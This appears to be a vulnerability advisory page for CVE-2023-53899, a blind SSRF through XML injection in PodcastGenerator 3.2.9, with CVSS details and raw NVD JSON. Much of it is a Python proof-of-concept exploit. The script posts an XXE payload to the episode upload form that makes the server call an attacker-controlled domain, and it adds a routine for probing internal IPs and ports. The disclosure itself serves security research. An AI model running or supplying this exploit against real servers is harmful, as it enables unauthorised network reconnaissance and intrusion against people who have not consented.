Security Vulnerability Report
中文
CVE-2023-53899 CVSS 9.8 CRITICAL

CVE-2023-53899

Published: 2025-12-16 17:16:02
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

PodcastGenerator 3.2.9 contains a blind server-side request forgery vulnerability that allows attackers to inject XML in the episode upload form. Attackers can manipulate the 'shortdesc' parameter to trigger external HTTP requests to arbitrary endpoints during podcast episode creation.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:podcastgenerator:podcast_generator:3.2.9:*:*:*:*:*:*:* - VULNERABLE
PodcastGenerator 3.2.9 及之前版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2023-53899 PoC - PodcastGenerator Blind SSRF via XML Injection # Target: PodcastGenerator 3.2.9 # Vulnerability: Blind SSRF through shortdesc parameter in episode upload form def exploit_blind_ssrf(target_url, attacker_domain): """ Exploit blind SSRF vulnerability by injecting XML with external entity Args: target_url: Base URL of vulnerable PodcastGenerator instance attacker_domain: Domain controlled by attacker to receive SSRF requests Returns: bool: True if exploit sent successfully """ # Construct the episode upload endpoint upload_endpoint = f"{target_url.rstrip('/')}/admin/episodes.php" # XML payload with external entity for SSRF # The &xxe; entity will trigger a request to attacker's domain xml_payload = f'''<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE episode [ <!ENTITY xxe SYSTEM "http://{attacker_domain}/ssrf-test"> ]> <episode> <title>Malicious Episode</title> <shortdesc>&xxe;</shortdesc> <longdesc>Test episode for CVE-2023-53899</longdesc> </episode>''' # Prepare the multipart form data files = { 'episodetitle': (None, 'CVE-2023-53899 Test Episode'), 'shortdesc': (None, xml_payload), # Inject XML in shortdesc parameter 'longdesc': (None, 'Testing blind SSRF vulnerability'), 'file': ('test.mp3', b'fake audio content', 'audio/mpeg') } try: # Send the malicious request response = requests.post( upload_endpoint, files=files, timeout=10, verify=False ) print(f"[+] Exploit request sent to {upload_endpoint}") print(f"[+] Payload length: {len(xml_payload)} bytes") print(f"[+] Status code: {response.status_code}") return True except requests.exceptions.RequestException as e: print(f"[-] Error sending exploit: {e}") return False def check_internal_service(target_url, internal_ip, internal_port): """ Check if internal service is accessible via SSRF Args: target_url: Target PodcastGenerator URL internal_ip: Internal IP address to probe internal_port: Internal port to probe """ # Construct URL pointing to internal service internal_url = f"http://{internal_ip}:{internal_port}" xml_payload = f'''<?xml version="1.0"?> <!DOCTYPE test [ <!ENTITY ssrf SYSTEM "{internal_url}"> ]> <data>&ssrf;</data>''' files = { 'episodetitle': (None, 'Internal Scan'), 'shortdesc': (None, xml_payload), 'longdesc': (None, 'Internal service probe'), 'file': ('probe.mp3', b'probe', 'audio/mpeg') } try: response = requests.post( f"{target_url}/admin/episodes.php", files=files, timeout=5 ) print(f"[*] Probed {internal_url} - Response: {response.status_code}") except: print(f"[*] Probed {internal_url} - No response (may be filtered)") if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve-2023-53899-poc.py <target_url> <attacker_domain>") print("Example: python cve-2023-53899-poc.py http://podcast.example.com attacker.com") sys.exit(1) target = sys.argv[1] attacker = sys.argv[2] print("="*60) print("CVE-2023-53899 PoC - PodcastGenerator Blind SSRF") print("="*60) exploit_blind_ssrf(target, attacker)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53899", "sourceIdentifier": "[email protected]", "published": "2025-12-16T17:16:02.213", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PodcastGenerator 3.2.9 contains a blind server-side request forgery vulnerability that allows attackers to inject XML in the episode upload form. Attackers can manipulate the 'shortdesc' parameter to trigger external HTTP requests to arbitrary endpoints during podcast episode creation."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:podcastgenerator:podcast_generator:3.2.9:*:*:*:*:*:*:*", "matchCriteriaId": "C9656104-821D-4468-A1B3-2536CC9C912C"}]}]}], "references": [{"url": "https://github.com/PodcastGenerator/PodcastGenerator", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://podcastgenerator.net/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51565", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/podcastgenerator-blind-server-side-request-forgery-via-xml-injection", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.